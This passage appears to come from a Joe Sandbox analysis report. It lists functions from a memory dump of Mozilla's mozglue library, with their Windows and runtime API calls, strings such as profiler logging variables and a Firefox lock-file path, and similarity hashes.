Instruction Fuzzy Hash: 5031E561E0068C97DB019B68CC489FEB778EF96608F055628EC49A7652FB30A588C7A1

Function 6C273E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C273EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C273FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C274006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C2740A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C273CCC), ref: 6C2740AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C273CCC), ref: 6C2740C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C274134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C273CCC), ref: 6C274143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C273CCC), ref: 6C274157

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: f5267456428e9c5df0f316fc3abe0363c22a6557b619298e91e9e6bbb030c6cc
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 91A17CB1A0021ACFDB54CF68C8C065AB7B5BF58308F2541A9DD09AF752D771E886CFA1

Function 6C262030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6C283F47,?,?,?,6C283F47,6C281A70,?), ref: 6C26207F
memset.VCRUNTIME140(?,000000E5,6C283F47,?,6C283F47,6C281A70,?), ref: 6C2620DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C283F47,6C281A70,?), ref: 6C26211A
EnterCriticalSection.KERNEL32(6C2EE744,?,6C283F47,6C281A70,?), ref: 6C262145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C283F47,6C281A70,?), ref: 6C2621BA
EnterCriticalSection.KERNEL32(6C2EE744,?,6C283F47,6C281A70,?), ref: 6C2621E0
LeaveCriticalSection.KERNEL32(6C2EE744,?,6C283F47,6C281A70,?), ref: 6C262232

Strings

MOZ_CRASH(), xrefs: 6C26227D
MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6C262253, 6C262268

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: 6c3bd5c9ddb46d7f9146d38abcc725f5e34e78dbb80f5653b709ff50ba2dc1a9
Instruction ID: d96141dcc84fd11d39e291ffbcc92f19912bd97d7662659ab0e2eac5d708afe2
Opcode Fuzzy Hash: 6c3bd5c9ddb46d7f9146d38abcc725f5e34e78dbb80f5653b709ff50ba2dc1a9
Instruction Fuzzy Hash: 3B61E6B1F0021E8FCB04CA6AC888B6E73B1AF59315F194175FD24B7EC5D7309880C6A1

Function 6C2B9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C2B8273), ref: 6C2B9D65
free.MOZGLUE(6C2B8273,?), ref: 6C2B9D7C
free.MOZGLUE(?,?), ref: 6C2B9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C2B9E0F
free.MOZGLUE(6C2B946B,?,?), ref: 6C2B9E24
free.MOZGLUE(?,?,?), ref: 6C2B9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C2B9EC8
free.MOZGLUE(6C2B946B,?,?,?), ref: 6C2B9EDF
free.MOZGLUE(?,?,?,?), ref: 6C2B9EF5

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 0c6505c26ded5601e07c2dc2081b3eea4557b8c81dc0b94aea95acd363d1a23e
Instruction ID: d3cba27ca8d9fa64ca6e9c6ca67abdf23e385ff90338c1fd650ab8c78330c585
Opcode Fuzzy Hash: 0c6505c26ded5601e07c2dc2081b3eea4557b8c81dc0b94aea95acd363d1a23e
Instruction Fuzzy Hash: 1D71B17490AB4A8BD712DF18C48055BF3F4FF99319B448619EC9A6B701EB30E885CB91

Function 6C2BDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C2BDDCF

Part of subcall function 6C29FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C29FA4B

Part of subcall function 6C2B90E0: free.MOZGLUE(?,00000000,?,?,6C2BDEDB), ref: 6C2B90FF
Part of subcall function 6C2B90E0: free.MOZGLUE(?,00000000,?,?,6C2BDEDB), ref: 6C2B9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2BDE0D
free.MOZGLUE(00000000), ref: 6C2BDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2BDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2BDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C2BDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C2ADEFD,?,6C274A68), ref: 6C2BDF32

Part of subcall function 6C2BDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C2BDB86
Part of subcall function 6C2BDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C2BDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C2ADEFD,?,6C274A68), ref: 6C2BDF65
free.MOZGLUE(?), ref: 6C2BDF80

Part of subcall function 6C285E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C285EDB
Part of subcall function 6C285E90: memset.VCRUNTIME140(ew,l,000000E5,?), ref: 6C285F27
Part of subcall function 6C285E90: LeaveCriticalSection.KERNEL32(?), ref: 6C285FB2

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 4d460166b2e5df91dc80feb8da55812d32e74ff766fe29a18deff3ef11708972
Instruction ID: a6ca04935f631d80b1a3dabcdebbbe461863569e1e0189459df1987f0f5ca6a5
Opcode Fuzzy Hash: 4d460166b2e5df91dc80feb8da55812d32e74ff766fe29a18deff3ef11708972
Instruction Fuzzy Hash: 6F51E6766057099BD7119A28C8806EEB376BF9538DF95002CFC1A73B04DB31F819CB92

Function 6C2C5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C2C5C8C,?,6C29E829), ref: 6C2C5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C2C5C8C,?,6C29E829), ref: 6C2C5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C2C5C8C,?,6C29E829), ref: 6C2C5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C2C5C8C,?,6C29E829), ref: 6C2C5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C2C5C8C,?,6C29E829), ref: 6C2C5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C2C5C8C,?,6C29E829), ref: 6C2C5DC9
std::_Facet_Register.LIBCPMT ref: 6C2C5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C2C5C8C,?,6C29E829), ref: 6C2C5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C2C5C8C,?,6C29E829), ref: 6C2C5E45

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: c7e1ef75d80a235bc85800ee2fcf3c1cba4ba294e7d27fcc9972be1c5f4d3173
Instruction ID: 58e09e87ee7566b408cf4bb417774d03af1ea505d3e31762418b5beca9c48eab
Opcode Fuzzy Hash: c7e1ef75d80a235bc85800ee2fcf3c1cba4ba294e7d27fcc9972be1c5f4d3173
Instruction Fuzzy Hash: F1418F3470030A8FCB40DF69C89CAAE77B5EF89715F044168ED0AA7791DB34E805CB61

Function 6C29CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C2631A7), ref: 6C29CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C29CFA4, 6C29CFB8
<jemalloc>, xrefs: 6C29CF9F, 6C29CFB3

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: b745d7317a33846888f711a463d8e232e6968dbbcac121d16426604e64bdd5c7
Instruction ID: 976db3bd5d4ea4d54793f38aeb93abb2de12045e352705cf0796f7910c46133d
Opcode Fuzzy Hash: b745d7317a33846888f711a463d8e232e6968dbbcac121d16426604e64bdd5c7
Instruction Fuzzy Hash: E631C530B4020E5BEB10AFA68C45B6E7B75BB49B15F204015FE16BBAC0DB70D800C7A4

Function 6C26ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C26F100: LoadLibraryW.KERNEL32(shell32,?,6C2DD020), ref: 6C26F122
Part of subcall function 6C26F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C26F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C26ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C26EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C26EDCC
CreateFileW.KERNEL32 ref: 6C26EE08
free.MOZGLUE(00000000), ref: 6C26EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C26EE32

Part of subcall function 6C26EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C26EBB5
Part of subcall function 6C26EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C29D7F3), ref: 6C26EBC3
Part of subcall function 6C26EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C29D7F3), ref: 6C26EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C26EDC1

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: b4cad13c8370914548db4e3da5968a888fe2d59d508dbaa2e812eda5c59c9b3f
Instruction ID: 39d09e37cd6b8882e8cce653dfc137d4dfee3e91d30cb08963f2fc4dcc8ad8eb
Opcode Fuzzy Hash: b4cad13c8370914548db4e3da5968a888fe2d59d508dbaa2e812eda5c59c9b3f
Instruction Fuzzy Hash: EE51BF71D052098BDB10DF69CC447EEB7B4AF59328F54842DEC556BB80EB306988CBB2

Function 6C2DA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C2DA565

Part of subcall function 6C2DA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2DA4BE
Part of subcall function 6C2DA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C2DA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C2DA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C2DA6B6

Strings

0, xrefs: 6C2DA5FB
z, xrefs: 6C2DA6AE

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 85a8216b7fed01c806627d0c552aafb1b69ed1f4c8320b56e85cf31af12d03df
Instruction ID: 8b2f2639346d0b5d5c5d3ce17f5cffe9bb6269d3a41151c34d5cb2825f282c57
Opcode Fuzzy Hash: 85a8216b7fed01c806627d0c552aafb1b69ed1f4c8320b56e85cf31af12d03df
Instruction Fuzzy Hash: 87414971919749DFC741DF28C080A8BBBF4BF99354F408A2EF89987650EB30E549CB92

Function 6C2678C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6C2E008B), ref: 6C267B89
free.MOZGLUE(?,6C2E008B), ref: 6C267BAC

Part of subcall function 6C2678C0: free.MOZGLUE(?,6C2E008B), ref: 6C267BCF

free.MOZGLUE(?,6C2E008B), ref: 6C267BF2

Part of subcall function 6C285E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C285EDB
Part of subcall function 6C285E90: memset.VCRUNTIME140(ew,l,000000E5,?), ref: 6C285F27
Part of subcall function 6C285E90: LeaveCriticalSection.KERNEL32(?), ref: 6C285FB2

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: 95f04fa114bb1efd48c0b3510b825d88114b006fcdca052d2163a5eecab1b2ab
Instruction ID: e8e4e13ae2e37189fcba36e5be6ef3cb9028f9dcd04dd18091167b5bde999222
Opcode Fuzzy Hash: 95f04fa114bb1efd48c0b3510b825d88114b006fcdca052d2163a5eecab1b2ab
Instruction Fuzzy Hash: C5C18F71E0112D8BEB24CB29EC90B9DB772AF41718F1506A9D81AE7FC0C7319EC58B61

Function 6C2A9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C29AB89: EnterCriticalSection.KERNEL32(6C2EE370,?,?,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284), ref: 6C29AB94
Part of subcall function 6C29AB89: LeaveCriticalSection.KERNEL32(6C2EE370,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C29ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
__Init_thread_footer.LIBCMT ref: 6C2A949F

Strings

MOZ_BASE_PROFILER_LOGGING, xrefs: 6C2A947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C2A946B
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C2A9459

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: e4fbb53ce17146e8798f6b14a88857061e9e1baad8787c4ae6a143f606fd0f27
Instruction ID: 28d9a0b4f70120b7dc6fcb456e6199fe159b467ef0143c186fbc3f580279060d
Opcode Fuzzy Hash: e4fbb53ce17146e8798f6b14a88857061e9e1baad8787c4ae6a143f606fd0f27
Instruction Fuzzy Hash: E0012D70A002098FE740E7DEE8189463374A70E729F040536EE0DA6BC1EB62D5A5C557

Function 6C2B0F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2B0F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2B0F88
GetCurrentThreadId.KERNEL32 ref: 6C2B0FF7
InitializeConditionVariable.KERNEL32(?), ref: 6C2B1067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C2B10A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C2B114B

Part of subcall function 6C2A8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C2C1563), ref: 6C2A8BD5

free.MOZGLUE(?), ref: 6C2B1174
free.MOZGLUE(?), ref: 6C2B1186

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 0ae8de6bfabe92a104967ebd442f24dfbbab1766e59e707cfe72665590e6c271
Instruction ID: 894eb3480ff7389195d1d0c259b69b8dacc14d6ad51f70b4a83dc5f0782f1703
Opcode Fuzzy Hash: 0ae8de6bfabe92a104967ebd442f24dfbbab1766e59e707cfe72665590e6c271
Instruction Fuzzy Hash: 6161C075A043499BDB11CF24C980B9AB7F5BFC9348F04891DED9967752EB31E488CB81

Function 6C26B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C26B61E,?,?,?,?,?,00000000), ref: 6C26B6AC

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C26B61E,?,?,?,?,?,00000000), ref: 6C26B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C26B61E,?,?,?,?,?,00000000), ref: 6C26B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C26B61E,?,?,?,?,?,00000000), ref: 6C26B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C26B61E,?,?,?,?,?,00000000), ref: 6C26B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C26B61E), ref: 6C26B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C26B61E,?,?,?,?,?,00000000), ref: 6C26B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C26B61E,?,?,?,?,?,00000000), ref: 6C26B79A

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: 32f46f17b276168c761940c6b3c5cfa1c3d4442d5d0bb52ac4312ff2f6a52de0
Instruction ID: 2595ea675149a317c984a46c846f8181142fdad70c8bb98ea778ed1c9bdb9a19
Opcode Fuzzy Hash: 32f46f17b276168c761940c6b3c5cfa1c3d4442d5d0bb52ac4312ff2f6a52de0
Instruction Fuzzy Hash: 9041C2B3D001198FCB11DF69DC80AAEB7B9BB54324F250629FC25E7B80E731A94487E1

Function 6C26EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6C2E5104), ref: 6C26EFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C26EFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C26EFEC
free.MOZGLUE(?), ref: 6C26F00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C26F02E
memcpy.VCRUNTIME140(00000000,?), ref: 6C26F041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C26F065
moz_xmalloc.MOZGLUE ref: 6C26F072

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
